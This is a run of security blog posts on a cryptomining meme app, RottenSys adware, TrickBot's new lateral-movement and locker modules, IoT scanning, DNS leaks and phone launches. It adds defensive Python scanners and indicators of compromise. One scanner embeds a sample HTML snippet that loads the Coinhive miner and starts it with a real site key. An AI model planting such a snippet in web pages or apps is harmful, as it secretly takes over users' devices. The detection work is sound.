Is someone mining cryptocurrencies on my device?
Mining cryptocurrencies is a hot topic these days. Are you aware that your own devices might be mining them without you even being aware of it? Our colleague Mihai Grigorescu, Malware Researcher at Avira, took a close look at MemeGenerator, a free Android app that also happens to mine Monero cryptocurrency, to see what would happen. Here are the key findings:
1. Cryptocurrency gets so hot
Installing MemeGenerator had a huge impact on the device's energy use and CPU load, as shown. The device was visibly warmer. It is not clear what running a device at such a high level will do to the device and to its battery in the long run.
2. Best cryptocurrency mining module
It is easy to craft a deceptive Android application for mining Monero cryptocurrency which looks completely innocent. The Coinhive Miner makes it easy to do. The only way a user can tell is when the device gets hot, a byproduct of the unusual load on the device during mining.
3. Tiny bits add up
The payoff for the cryptocurrency miners on your device is tiny – but can add up. Unlike PCs, mobile devices don’t have the processing power to allow an attacker to mine a significant amount of cryptocurrency. However, the small amount they do mine adds up with each infected device and apps like MemeGenerator make it possible to infect a large number of Android devices.
4. Remember, it’s your device
Here is the complete story of Mihai’s interaction with the MemeGenerator app:
That innocent first look
First thing we’ve learned about any mobile app is to look carefully at the required permissions.
Well, this application didn’t require any suspicious permissions – network access was obviously required to share any generated memes with friends, and saving files to the SD card could also be required to save the memes.
As the application seemed legit, this could trap any user into clicking “Install” to continue the installation.
After installation, the app created a nice launcher icon, so we clicked on it …
Without any explanation, we got a list of images to choose from. Thinking that these were the desired background images, we chose one:
We got two input boxes, prefilled with “Texto superior” and “Texto inferior”. After filling them with the text “why is my phone hot” we got the finished meme and options to share it via email, MMS message, or Bluetooth.
At first glance, this looked like a very simple app which got the job done – it generated our customized meme.
There was absolutely nothing that would have made a user suspect that there was anything wrong going on with this app. Yet, there was a problem – the device was getting hot.
Looking under the hood
A quick look in LogCat revealed that the application was built with App Inventor and it was loading some content into a WebView.
We decompiled the application to take a closer look:
Looking through the code, we saw that the content was loaded from inside the APK file, from the android_asset folder, so we began by examining this file:
This was the HTML code that generated the list of background images we had picked from earlier, and we saw that it was loading a min.js file:
This was the Coinhive Miner from coinhive.com, we saw the same syntax in their documentation:
So, in our case, ‘K2hXuRJ7cExO4bPknDEWhDabqM0Ls8e3’ was the site key.
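A static check for the pattern found above, as an added example that is not part of Mihai's analysis: it scans the HTML and JS assets of an unpacked APK for a script tag pulling Coinhive's min.js and for a site key handed to the miner. The `new CoinHive.Anonymous('<site key>')` form is assumed from Coinhive's public documentation (the write-up only says the syntax matched the docs), and the sample asset is constructed around the site key recovered above.

```python
import os
import re
from typing import Dict, List

# A <script> tag whose src points at Coinhive, and the documented
# CoinHive.Anonymous('<site key>') constructor (assumed form, see lead-in).
MINER_SCRIPT_RE = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']([^"']*coinhive[^"']*)["']""", re.IGNORECASE)
SITE_KEY_RE = re.compile(
    r"""CoinHive\.Anonymous\s*\(\s*["']([A-Za-z0-9]+)["']""")
START_RE = re.compile(r"\.start\s*\(")


def scan_asset_html(content: str) -> Dict[str, object]:
    """Return the Coinhive indicators found in one HTML/JS asset's text."""
    scripts = MINER_SCRIPT_RE.findall(content)
    keys = SITE_KEY_RE.findall(content)
    return {
        "miner_scripts": scripts,
        "site_keys": keys,
        # A site key without a .start() call is still worth reporting, so both
        # facts are recorded separately.
        "starts_miner": bool(keys) and bool(START_RE.search(content)),
    }


def scan_assets_dir(root: str) -> List[Dict[str, object]]:
    """Walk an unpacked APK's assets folder (android_asset in the WebView URL)
    and report every HTML/JS file that references the miner or embeds a key."""
    findings: List[Dict[str, object]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm", ".js")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                result = scan_asset_html(fh.read())
            if result["miner_scripts"] or result["site_keys"]:
                result["path"] = path
                findings.append(result)
    return findings


# Constructed sample asset modelled on the description above; the site key is
# the one the analysis recovered from MemeGenerator.
SAMPLE_ASSET_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('K2hXuRJ7cExO4bPknDEWhDabqM0Ls8e3');
  miner.start();
</script>
</head><body><img src="bg1.jpg"><img src="bg2.jpg"></body></html>"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for finding in scan_assets_dir(sys.argv[1]):
            print(finding["path"], finding["site_keys"], finding["miner_scripts"])
    else:
        print(scan_asset_html(SAMPLE_ASSET_HTML))
```

Run it with the path of an `apktool`-style unpacked APK's `assets` directory to list every file carrying the miner.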
I was burning for you
It was no illusion – the smartphone was really getting warmed up. Before starting the app, the first CPU load graph showed a device at rest. But once the app was running, a substantial 48% of the CPU – a load value shown by the green part of the pie chart – was used consistently for mining.
MEME Cryptocurrency conclusions
Coinhive Miner makes it clear with its modular approach: it is easy to make a harmless-looking app for mining cryptocurrency. The only way a user can tell is when the device gets hot – a byproduct of the unusual load on the device when it is mining.
- K2hXuRJ7cExO4bPknDEWhDabqM0Ls8e3 – Coinhive site key
- 6d4daa7588df5e864485b6aab665bd66c79fe6aed842f22d86b8a54bd6dcc3a6 – Android application
- 712bb1af37e7a67f86eb8b2826b8e9bd90af1d0cf213e0d8f5392dcdb5f8ed5d – coinminer JS
RottenSys: Some smartphones are coming with malware already installed
This is probably the one smartphone feature you did not have on your “must have” list: Researchers have uncovered a stream of phones hitting the market which come with malware, named RottenSys, pre-installed – without their new owners having to do a single swipe.
Nearly 5 million phones are believed to be included in this scheme. Impacted labels include GIONEE, Honor, Huawei, OPPO, Samsung, Vivo and Xiaomi. While all of the infected phones seem to have come through Tian Pai, a Chinese distributor based in Hangzhou, the precise connection has not yet been uncovered.
While the malware has been named RottenSys, impacted users see it as a more innocuous “System Wi-Fi service” app that came pre-installed on their phones.
RottenSys comes in quietly
RottenSys does not start out malicious, so as not to set off any alarms. Instead, it begins by chatting with its command-and-control servers to fetch first a shopping list and then the malicious code itself.
This particular batch of code turns into an adware campaign with a barrage of ads appearing on the victim’s device as full-screen and pop-up ads, producing a stream of ad revenue for the cybercriminals.
Then it pumps up the volume
That is just the start. The Check Point researchers believe the malware can then mutate according to whatever its C&C overlords command. They expect that the malware will become part of a larger botnet which could distribute other apps and change the victim’s UI around.
RottenSys is part of the modern trend in malware of not taking money directly from your pocket like ransomware – but forcing you to watch irritating ads – and then billing the advertisers for their effort. Nobody is saying if these ads are really “high value”.
Software is built like your car – drive with care
At its core, RottenSys is a supply chain vulnerability in the software industry. It is like your car, with multiple factories making foam padding, fabrics, steel frames, another factory putting this together into a seat and shipping it off to the final assembly plant where it arrives about 45 minutes before being bolted into place. Automakers watch this entire supply chain extremely closely — and RottenSys is a sign that the IT industry needs to do so as well.
What can you do to stay safe
There is a silver lining though. Due to the prerequisites that need to be met for the malware to be on your phone, most of the infected phones are based in China – so if you have not bought your device from over there, you should be safe. To be really sure though, you can do the following:
Go to your Android system settings and from there into the App Manager. Then look for the following possible malware package names:
- com.android.yellowcalendarz (每日黄历)
- com.changmi.launcher (畅米桌面)
- com.android.services.securewifi (系统WIFI服务)
If any of the above is in the list of your installed apps, simply uninstall it and you should be fine.
Five smartphones from the Mobile World Congress
With the 2018 Mobile World Congress having just concluded, we can now review what was presented. There was no knockout presentation, no new rising trend: only the impression that this edition was just an obligatory yet non-essential meeting heading towards a new way of understanding mobile telephony. Besides, a toned-down gathering was to be expected: Samsung‘s top-of-the-range product had already been widely revealed through leaks over the previous months; Huawei clocked in with a few tablets and notebooks but no phones, while other products in their line were upgraded in order to measure up to the competition, at least in their design.
For once, the interest fell on minor brands, at least compared to the more famous names which, having nothing to lose, took even more of a risk by cashing in on an event devoid of any particular focus on innovation. We’re talking about Asus and Sony, which could take off once again after years of deep obscurity, but also about the revival of Nokia and Alcatel, two historic names in the mobile phone field that have fallen under the blows of the oligarchic Samsung-Apple-Huawei trifecta. However, something to absolutely consider over the next few months is that the 2019 edition will most likely be one of the most important events ever seen, as it will be completely dedicated to 5G services, which will be active in major cities shortly afterwards (here’s what to consider before buying a new cellphone). In the meantime, let’s take a look at the five main smartphone models from the 2018 Mobile World Congress.
Samsung Galaxy S9+
We chose the Plus version as it’s the most comprehensive: the first in the S series equipped with a double camera (here are the best phone cameras of 2017). Samsung put its primary focus on the latest optical sensors when creating its new leading product. In fact, the second lens creates a shallow depth-of-field effect, also known as bokeh, although the true innovation is inside the prime chipset. Here, the South Korean company introduced an automatic variable aperture, a system derived from semi-professional cameras, which allows more light to be captured in poor lighting conditions. In this way, you can take quality images even in dark environments, with remarkable results both in terms of definition and in reducing image noise, those annoying pixels that stand out from the background. Also worth mentioning are the dual stereo speakers, the Dolby Atmos feature, and the arrival of AR Emojis, animated emoticons created from a selfie. Price: €999.
Asus Zenfone 5Z
This is the first Android phone by a multinational corporation to adopt the form of the iPhone X. In reality, Asus has only borrowed the front face of the phone: just enough to make any imaginable comparisons with Apple. Aesthetically, there are no half measures: either you like the Zenfone 5 or you don’t; just like the iPhone X, which has both its fans and critics. Android seems to work well on board the new Asus model, although a certain form of optimization is still truly needed in order to fully take advantage of the notch. Zenmojis are featured here as well (the usual animated emoticons), and while a sort of Face ID would have been nice, biometric fingerprint security instead takes its place. The phone will arrive in the US in June with various sizes of RAM and internal memory. Price: starting at €479.
Nokia 8 Sirocco
Everyone was expecting the Nokia 9, and yet here’s the plot twist. The new top-of-the-range product from the reinvigorated Finnish company is Sirocco, a device with a 5.5-inch OLED screen and curved edges. Its strong point is its collaboration with Carl Zeiss, a legendary name in mobile phone optics, which has already worked alongside Nokia many times. The German company provided a dual rear camera with optimal photo and video quality. Everything is powered by Snapdragon 835, which is not all that recent but still able to offer reliability as well as no delays or issues during everyday use of the device. The cost is in line with its competition, although at this point it makes more sense to wait for the Nokia 9, which will arrive on the market by the summer. Price: €749.
The French company has quietly continued to launch mid-market phones that pique some public interest. This time around, it is doing so by revolutionizing the shapes of its products, upgrading all of its new models to feature the 18:9-dimensional ratio. The 5.7-inch screen of the 2018 flagship product is truly a sight to see, and the hardware should most definitely not be underestimated. For example, it features a dual front camera that allows for panoramic selfies, so no one is left out of the shot: when the sensor recognizes that there is more than one face, it adjusts the field of view to 120 degrees to automatically shoot in wide-angle mode. There’s even a variation of Face ID, which memorizes 100 facial features to unlock the phone in just a few seconds.
Sony Xperia XZ2
Last but certainly not least is the Dynamic Vibration System: a system that Sony Mobile presented on the occasion of the Xperia XZ2 launch. Here’s how it works: an integrated algorithm converts the audio of films, games, and apps into small vibrations that travel along the surface of the phone. The dynamism of the sound proceeds at the same pace as the vibration, giving the user an additional sense of engagement in tactile form like never before. On top of this is a high-end multimedia component: a Snapdragon 845 CPU, a camera capable of recording in slow motion at 960 fps in Full HD (the Galaxy S9 stops at just 960 fps), and a design finally in line with the competition’s Full Vision smartphones. All things considered, with the Xperia XZ2, the Japanese company is ensuring a solid re-launch into the mobile phone sector. Price: €799 (to be confirmed).
Is your home a smart home? Make it safer
Give your home a free intelligence test with the Avira Home Guard. The wave of smart devices flooding homes has created a security rip current: the situation looks fine, but there are many security issues just lurking below the surface that many people are not wanting to take a deep look into.
The Internet of Things (IoT) is based on smart devices equipped to send and receive data via the internet. At first glance, a smart home equipped with a portfolio of various smart devices is great: video cameras providing 24/7 CCTV coverage, health devices sending your vital stats to the doctor, and smart thermostats that know how to keep you (efficiently) toasty warm.
Is this really so smart?
But after a second – security-conscious – glance, this might not be so good. Smart devices are known for often having unencrypted communication, giving anyone sitting between you and the device’s server an easy man-in-the-middle path to your private data. The Economist Intelligence Unit* found that 70% of the devices they looked at did not encrypt the user data sent to their servers.
It’s no longer a security issue of an individual device. Mirai-inspired malware scans the internet looking for online devices “protected” only by their default settings. Once it finds these devices, they can be enslaved into a botnet and harnessed to deliver spam and even knock parts of the internet offline. And it does not help that some companies producing IoT devices use the same default settings across their entire product lineup.
It’s a global issue – but it’s also your problem
The problem is bigger than your home network. There are billions of smart devices online and it is not clear which devices are intrinsically insecure, what devices have not had passwords changed from the default settings, and who could be reading the unencrypted user data. Even though there are numerous security issues for smart devices, there are still no global standards for them.
How to properly invest in the Internet of Things
Despite these risks, most people are in an IoT “cloud of unknowing” about the security of their home network: they are unsure – but uneasy – about the IoT devices in their network, but they aren’t taking steps to clear up this ambiguity. However, there is no reason to just fret over the potential IoT risks lurking in the shadows of the home network, it’s time to uncover them.
The need for a basic security test is why we developed Avira Home Guard. We wanted to make an app that gave people a clear look at the security of their smart home along with some suggestions on how to improve it. — Vikas Seth, Business Unit Lead at Avira.
Home Guard is a free app for Windows that scans for smart devices in the network, identifies security vulnerabilities, suggests solutions, and keeps an inventory of connected devices.
How to really make your home a smart home
Home Guard can be installed with one click via the Avira Client on Windows. Make another click, and you can start the automatic device discovery scan, giving you complete visibility into what devices are connected to your network and their potential vulnerabilities.
Here are the three primary actions with Home Guard:
- Scanning the home network. Avira Home Guard automatically discovers the connected network, then goes to work identifying everything on it. This list includes smart devices, Wi-Fi routers, cameras, smart TVs, Wi-Fi printers, media servers as well as other computers, tablets or smartphones in the house.
“I don’t think most people are really aware of just how many devices may be on their home network – even if they are techies,” explains Vikas. “There are always devices coming and going from various family members.”
- Uncovering vulnerabilities and recommending solutions. Avira Home Guard scans the router for known vulnerabilities such as open ports. Once identified, Home Guard informs and advises the user to immediately close the unwanted ports on the router.
“Open external ports allow just about anyone to contact and exchange information with the online device,” he added. “In this case, knowledge is power, and the alert from Home Guard is a clear sign that you should go into your router settings and shut it down.”
- Remembering all online devices. Home Guard has a memory, remembering all devices that have been connected to the network in the past in addition to automatically looking for new devices. This memory enables it to more accurately chart all devices on the network.
“Not all devices are going to be home or online when you do your first scan,” Vikas points out. “With Home Guard, this is no problem as the app will remember all devices that have been online and continuously rescan for additional ones. This lets you – as the de facto administrator of your home network – stay on top of what devices can be running around your network.”
How smart is your home?
Your house may be smarter than you think. Not only does this include your own personal devices, it includes the devices of other people within your home network, and perhaps those traditionally “dumb” devices such as fridges and light bulbs. With Home Guard, you don’t need to wonder about how smart your house may be. Instead, you can map out the connected devices in your house and the information needed to take remedial security steps. After all, a smart house should have a smart and informed owner.
TrickBot Banking Trojan Adapts with New Module
Since its inception in late 2016, the TrickBot banking trojan has continually undergone updates and changes in attempts to stay one step ahead of defenders. While TrickBot has not always been the stealthiest trojan, its authors have remained consistent in the use of new distribution vectors and development of new features for their product. On March 15, 2018, Webroot observed a module (tabDll32 / tabDll64) being downloaded by TrickBot that had not been seen in the wild before this time.
It appears that the TrickBot authors are still attempting to leverage MS17-010 and other lateral movement methods coupled with this module in an attempt to create a new monetization scheme for the group.
You can teach an old bot older tricks
- 0058430e00d2ea329b98cbe208bc1dad – main sample (packed)
- 0069430e00d2ea329b99cbe209bc1dad – bot 32 bit
- 711287e1bd88deacda048424128bdfaf – systeminfo32.dll
- 58615f97d28c0848c140d5e78ffb2add – injectDll32.dll
- 30fc6b88d781e52f543edbe36f1ad03b – wormDll32.dll
- 5be0737a49d54345643c8bd0d5b0a79f – shareDll32.dll
- 88384ba81a89f8000a124189ed69af5c – importDll32.dll
- 3def0db658d9a0ab5b98bb3c5617afa3 – mailsearcher32.dll
- 311fdc24ce8dd700f951a628b805b5e5 – tabDll32.dll
Upon execution, this iteration of TrickBot will install itself into the %APPDATA%\TeamViewer\ directory. If the bot has not been executed from its installation directory, it will restart itself from this directory and continue operation. Once running from its installation directory, TrickBot will write to the usual group_tag and client_id files along with creating a “Modules” folder used to store the encrypted plug and play modules and configuration files for the bot.
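A host check for the install layout just described, added here as an example and not part of Webroot's write-up: it looks under %APPDATA% for the TeamViewer folder, the group_tag and client_id files and the Modules folder. The sample tree it builds is constructed for demonstration; the file name `sample.exe` is a placeholder, not the real bot's name.

```python
import os
from typing import List

# Artifacts the analysis above attributes to this TrickBot build.
INSTALL_SUBDIR = "TeamViewer"
MARKER_FILES = ("group_tag", "client_id")
MODULES_DIR = "Modules"


def find_trickbot_artifacts(appdata: str) -> List[str]:
    """Return findings for the TrickBot install layout under the given
    %APPDATA% directory; an empty list means no marker was present.
    The TeamViewer folder on its own is deliberately not reported: a legitimate
    TeamViewer install creates it too, the bot's marker files are what matter."""
    install = os.path.join(appdata, INSTALL_SUBDIR)
    findings: List[str] = []
    if not os.path.isdir(install):
        return findings
    for marker in MARKER_FILES:
        path = os.path.join(install, marker)
        if os.path.isfile(path):
            findings.append(f"marker file present: {path}")
    modules = os.path.join(install, MODULES_DIR)
    if os.path.isdir(modules):
        names = sorted(os.listdir(modules))
        findings.append(f"Modules folder present with {len(names)} entries: {names}")
    # Executables living next to the markers are candidate bot binaries.
    for name in sorted(os.listdir(install)):
        if name.lower().endswith(".exe"):
            findings.append(f"executable in install dir: {os.path.join(install, name)}")
    return findings


def build_sample_tree(root: str) -> str:
    """Create a constructed copy of the layout described above under root
    (demonstration and testing only) and return the fake %APPDATA% path."""
    appdata = os.path.join(root, "AppData", "Roaming")
    install = os.path.join(appdata, INSTALL_SUBDIR)
    os.makedirs(os.path.join(install, MODULES_DIR), exist_ok=True)
    for marker in MARKER_FILES:
        with open(os.path.join(install, marker), "wb") as fh:
            fh.write(b"constructed")
    # Module names from the list above; contents are placeholders (the real
    # files are encrypted).
    for mod in ("systeminfo32", "injectDll32", "tabDll32"):
        with open(os.path.join(install, MODULES_DIR, mod), "wb") as fh:
            fh.write(b"constructed placeholder")
    with open(os.path.join(install, "sample.exe"), "wb") as fh:  # placeholder name
        fh.write(b"MZ")
    return appdata


if __name__ == "__main__":
    real_appdata = os.environ.get("APPDATA")
    if real_appdata:
        for line in find_trickbot_artifacts(real_appdata):
            print(line)
    else:
        import tempfile
        for line in find_trickbot_artifacts(build_sample_tree(tempfile.mkdtemp())):
            print(line)
```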
Many of the modules shown above have been previously documented. The systeminfo and injectDll modules have been coupled with the bot since its inception. The mailsearcher module was added in December 2016 and the worm module was discovered in late July 2017. The module of interest here is tabDll32, as this module has been previously undocumented. Internally, the module is named spreader_x86.dll and exports four functions similar to the other TrickBot modules.
The file has an abnormally large rdata section which proves to be quite interesting because it contains two additional files intended to be used by spreader_x86.dll. The spreader module contains an additional executable SsExecutor_x86.exe and an additional module screenLocker_x86.dll. Each module will be described in more detail in its respective section below.
When loading the new TrickBot module in IDA, you are presented with the option of loading the debug symbol file, whose path is shown.
This gives us a preview of how the TrickBot developers structure new modules that are currently under development. When digging deeper into the module, it becomes evident that this module is used to spread laterally through an infected network making use of MS17-010.
This module appears to make use of lateral movement in an attempt to set up the embedded executable as a service on the exploited system. Additionally, the TrickBot authors appear to be still developing this module, as parts of the module’s reflective DLL injection mechanism are copied from a GitHub project.
Image 5: Copied code from ImprovedReflectiveDLLInjection
Image 6: Printf statements from the copied project on GitHub
The second phase of the new module comes in the form of an executable meant to run post-exploitation. Again, it was very nice of the TrickBot authors to give us a look at the debug symbol file path.
When run, this executable iterates over the user profiles in the registry and goes to each profile to add a link to the copied binary in the startup path. This occurs after lateral movement takes place.
Similarly to the other TrickBot modules, the screenLocker module was written in Delphi. This is the first time TrickBot has shown any attempt at “locking” the victim’s machine.
This module exports two functions, “MyFunction” and a reflective DLL loading function. “MyFunction” appears to be the work in progress:
If the TrickBot developers are attempting to complete this locking functionality, this generates interesting speculation around the group’s business model. Locking a victim’s computer before you are able to steal their banking credentials alerts the victim that they are infected, thus limiting the potential for credit card or bank theft. However, extorting victims to unlock their computer is a much simpler monetization scheme.
It is notable that this locking functionality is only deployed after lateral movement, meaning that it would be used to primarily target unpatched corporate networks. In a corporate setting (with unpatched machines) it is highly likely that backups would not exist as well. The authors appear to be getting to know their target audience and how to best extract money from them. On a corporate network, where users are unlikely to be regularly visiting targeted banking URLs, exfiltrating banking credentials is a less successful money-making model compared to the locking of potentially hundreds of machines.
The TrickBot authors continue to target various financial institutions across the world, using MS17-010 exploits in an attempt to successfully laterally move throughout a victim’s network. This is being coupled with an unfinished “screenLocker” module in a new possible attempt to extort money from victims. The TrickBot banking trojan remains under continual development and testing in a constant effort by its developers to stay one step ahead.
Spectre, Meltdown, & the CLIMB Exploit: A Primer on Vulnerabilities, Exploits, & Payloads
In light of the publicity, panic, and lingering despair around Spectre and Meltdown, I thought this might be a good time to clear up the differences between vulnerabilities, exploits, and malware. Neither Spectre nor Meltdown are exploits or malware. They are vulnerabilities. Vulnerabilities don’t hurt people, exploits and malware do. To understand this distinction, witness the CLIMB exploit:
Frequently, when a vulnerability is exploited, the payload is malware. But the payload can be benign, or there may be no payload delivered at all. I once discovered a windows vulnerability, exploited the vulnerability, and was then able to deliver the payload. Here’s how that story goes:
It’s kind of embarrassing to admit, but one evening my wife and I went out to dinner, and upon returning, realized we had a problem. It wasn’t food poisoning. We were locked out of our house. The solution was to find a vulnerability, exploit it, and get into the house. The vulnerability I found was an insecure window on the ground floor.
With care I was able to push the window inward and sideways to open it. From the outside, I was able to bypass the clasp that should have held the window closed. Of course, the window was vulnerable for years, but nothing bad came of it. As long as nobody used (exploited) the vulnerability to gain unauthorized access to my home, there was no harm done. The vulnerability itself was not stealing things from my home. It was just there, inert. It’s not the vulnerability itself that hurts you. It’s the payload. Granted, the vulnerability is the enabler.
The window was vulnerable for years, but nothing bad happened. Nobody attacked me, and while the potential for attack was present, an attack (exploit) is not a vulnerability. The same can be true of vulnerabilities in software. Opening the window is where the exploit comes in.
My actual exploit occurred in two stages. First, there was proof of concept (POC). After multiple attempts, I was able to prove that the vulnerable window could be opened, even when a security device was present. Next, I needed to execute the Covert Lift Intrusion Motivated Breach (CLIMB) exploit. Yeah, that means I climbed into the open window, a neat little exploit with no coding required. I suppose I could have broken the window, but I really didn’t want to brick my own house (another vulnerability?).
Now we come to the payload. In this case, the payload was opening the door for my wife. You see, not all payloads are malicious. If a burglar had used the CLIMB exploit, they could have delivered a much more harmful payload. They could have washed the dishes (they wouldn’t, unless they were Sheldon Cooper), they could have stolen electronic items, or they could have planted incriminating evidence. The roof is the limit.
Not all vulnerabilities are as easy to exploit as others. All of my second-floor windows had the same vulnerability, but exploiting them would have been more difficult. I am sure happy that I found the vulnerability before a criminal did. Because I was forgetful that fateful night, I’m also happy the vulnerability was there when I found it. As I said, I really didn’t want to break my own window. By the way, I “patched” my windows vulnerability by placing a wooden dowel between the window and the wall.
There you have it. Vulnerabilities, exploits, and payloads explained through the lens of the classic CLIMB exploit.
Cyber News Rundown: Hackable Gas Stations
Global Gas Station Software Found Unsecured
Researchers have recently discovered a vulnerability that would allow anyone to remotely access thousands of gas stations around the world. The vulnerability stems from these stations being connected to the Internet and can give a potential attacker control of gas prices, access to customer payment information, and even control over surveillance cameras. Unfortunately, due to the average age of the pumps in question and the preinstalled software also being outdated, it is unlikely that many of the machines will, or even can, be updated to protect against these vulnerabilities.
NHS Staff Ignoring Security Policies in Favor of Usability
In a recent survey of NHS professionals, it was found that nearly half are using non-approved messaging apps on a regular basis, rather than more secure channels, as they are quicker and easier to use. Even more alarming, a similar number were either completely unaware of their organization’s policies for safely transferring data or had not received any training on the subject. With data security becoming ever more necessary, the organizations that hold our most sensitive data should be held to an even higher standard, as typical consumers have little choice but to trust that they will keep it safe.
Fortnite Mobile Invite Scams Flood Market Prior to Launch
In the days preceding the launch of Fortnite’s mobile iOS functionality, hundreds of users have taken to posting fake “invites” for sale throughout various social media sites. While the actual launch is still several days away, these invites have been offered for a variety of prices in hopes of finding someone eager enough to pay to play early.
AMD Chips Contain Critical Vulnerabilities
Over the last week or so, several critical flaws have been found within AMD processor chips that could be harmful if exploited. While it would already require some administrative access to even begin using the vulnerabilities for harm, the exploit does allow unsigned, and possibly malicious, code to be uploaded to AMD’s Secure Processing Platform without performing any security checks. As these vulnerabilities are still being researched, the extent of their severity has yet to be fully decided.
Florida Virtual School Hit by Data Breach
Within the last few weeks, officials have been working to contact students, parents, and staff who may have been affected by a data breach that occurred sometime in the last year. While it is still unclear what sensitive data may have been compromised, identity and credit monitoring services are being provided to anyone who was in the database over the two-year period when it was illicitly accessed.
Psst! Don’t let your DNS leak all over the internet
When it comes to encryption, it’s that last mile in front of the house that matters. Encryption offered by some security products can leave a lot to be desired – particularly the last mile up to your front door. While they might be encrypting the contents of your online activities, they are often failing to do this for your DNS – the Domain Name System – the process for converting domain names into numerical IP addresses.
Hey you down there!
That’s like living in a second-floor apartment with a secured main door and a broken intercom. When a friend comes to visit, you stick your head out the window and shout down below, “Hey Robert! The PIN code for the front door is 12345 and I’m on the second floor.”
What a security failure. Everyone within earshot knows exactly where you live, that you have a visitor, what his name is – and let’s not talk about that private security code.
This little shout out the window is what security people call a DNS leak. It’s very clear that the two individuals were talking but we just don’t know about what Robert and John were speaking (that part might have been encrypted). From just a common sense perspective, “John was talking to Robert” is a much less secure and private conversation than “John was talking to someone.”
The who, what, and where
For a “normal” unencrypted online interaction, this means that the Internet Service Provider (ISP) – or anyone else rubbernecking their way into the conversation between John and Robert – knows three basic details about the conversation:
- They know who was speaking (thanks to the DNS).
- They know what was being said (reading those unencrypted data packets).
- They know the where (geo-locating that IP address).
When it comes to the benefits from a VPN, the where and the what are at the top of the list. Where – yes, people like being able to get geo-restricted content. Especially those everyday sites that you go to at home and would really like to see when on vacation. What is also important. The knowledge that about anyone can intercept and track online activity over an open WiFi is unsettling. In many ways, it does not matter if it is the network manager at the local café or a cyber criminal sitting across from me in that same café – I just don’t want them listening in to my conversation. So I will encrypt the conversation and keep it a private conversation.
Let’s talk about the who
The who is where the DNS, short for Domain Name System, comes in. This is the process for translating domain names like avira.com into a numerical IP address such as 18.104.22.168. Under normal circumstances, once you go online and type in a URL, your device contacts the DNS server run by your internet provider and asks it for the IP address of that name, so it knows where to send your data packets.
They know who you are talking to – but it is not a given. You don’t have to give your ISP this information – if you have a VPN properly working.
More than a wee little DNS leak
The problem is that VPN and proxy apps have DNS issues – they can leak. And they leak a LOT. Researchers from Australia’s Commonwealth Scientific and Industrial Research Organization (CSIRO), the University of New South Wales, and the University of California, Berkeley looked at 283 VPN apps for Android-powered smartphones and found more than just small leaks. Their report stated, “66% of the VPN apps do not forward DNS traffic through the VPN tunnel so any in-path observer can monitor the DNS networking activity of the user.” Yes, leaking apps are “not effective against surveillance and malicious agents.”
DNS puddle is a dual problem
A DNS leak is a dual problem. First, it lets the ISP – and just about anyone else listening in – know exactly whom you are contacting. While the contents of the conversation may be private, they would know that “John was talking to Robert.”
Second, it lets the ISP be a potential traffic cop. Not only do they know who you are communicating with, they are potentially in the position to block access to certain sites. This could be an app such as Twitter or a website with streaming content that has upset the local authorities.
Remember the DNS
A VPN should – if done correctly – keep your DNS info private and encrypted. And it should be doing this regardless of whether your device is running Android, Apple’s iOS, or Windows, and regardless of whether it is a free or a premium app. If you want to talk to Robert, make it really private.
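To make the “who” and the leak concrete, here is an added example (not code from the Avira article): it encodes the plain DNS query a device sends for a name, shows what an in-path observer can read from that query, and flags DNS flows that bypass the VPN tunnel. The resolver addresses, interface names and flow records are constructed sample values.

```python
# Added example: plain DNS query encoding, what an observer reads, and a leak check.
# All addresses, interface names and flows below are constructed sample values.
import struct


def build_dns_query(name, txid=0x1234):
    """Encode an RFC 1035 A/IN query: 12-byte header, QNAME labels, QTYPE, QCLASS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def qname_from_query(packet):
    """The 'who' an in-path observer reads from an unencrypted DNS query."""
    labels, pos = [], 12  # the question section starts right after the header
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def find_dns_leaks(flows, tunnel_resolver):
    """Return UDP/53 flows sent to any resolver other than the one inside the tunnel.

    Each flow is a dict with 'dst', 'dport', 'iface' and 'query'. A query that goes
    to the ISP resolver on the physical interface instead of the tunnel resolver is
    the leak described in the text: the name is readable by anyone on the path.
    """
    return [f for f in flows if f["dport"] == 53 and f["dst"] != tunnel_resolver]


# Constructed sample data: one device, same lookup sent two different ways.
TUNNEL_RESOLVER = "10.8.0.1"        # resolver reachable only through the VPN tunnel
ISP_RESOLVER = "198.51.100.53"      # ISP resolver on the untrusted local network
SAMPLE_FLOWS = [
    {"dst": TUNNEL_RESOLVER, "dport": 53, "iface": "tun0", "query": build_dns_query("avira.com")},
    {"dst": ISP_RESOLVER, "dport": 53, "iface": "wlan0", "query": build_dns_query("avira.com")},
    {"dst": "192.0.2.10", "dport": 443, "iface": "tun0", "query": b""},  # tunnelled HTTPS
]

if __name__ == "__main__":
    for leak in find_dns_leaks(SAMPLE_FLOWS, TUNNEL_RESOLVER):
        print(f"DNS leak via {leak['iface']} to {leak['dst']}: "
              f"observer sees '{qname_from_query(leak['query'])}'")
```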
Evolving Cyberattacks – The Escape
Why are sophisticated techniques failing to defend companies from Cyberattacks?
As the introduction of the internet has created a new battlefield, you can have world-class firewalls, or keep your system updated with the latest anti-virus software releases, and yet your business will not be immune to data breaches, cyberattacks, and internal threats.
A study conducted by the Ponemon Institute in 2016 illustrates that cyber attackers are winning over “defenders”, as they exploit vulnerabilities much faster than defenders mitigate them. The study revealed that 55 percent of small businesses had been subject to a cyberattack in the previous year, while 50 percent said they had been victims of a data breach during that year.
However, cyberattacks do not account for the largest part of SMB data breaches. The Ponemon survey confirmed that 41 percent of SMB data compromises were due to mistakes made by negligent employees, contractors, and third parties.
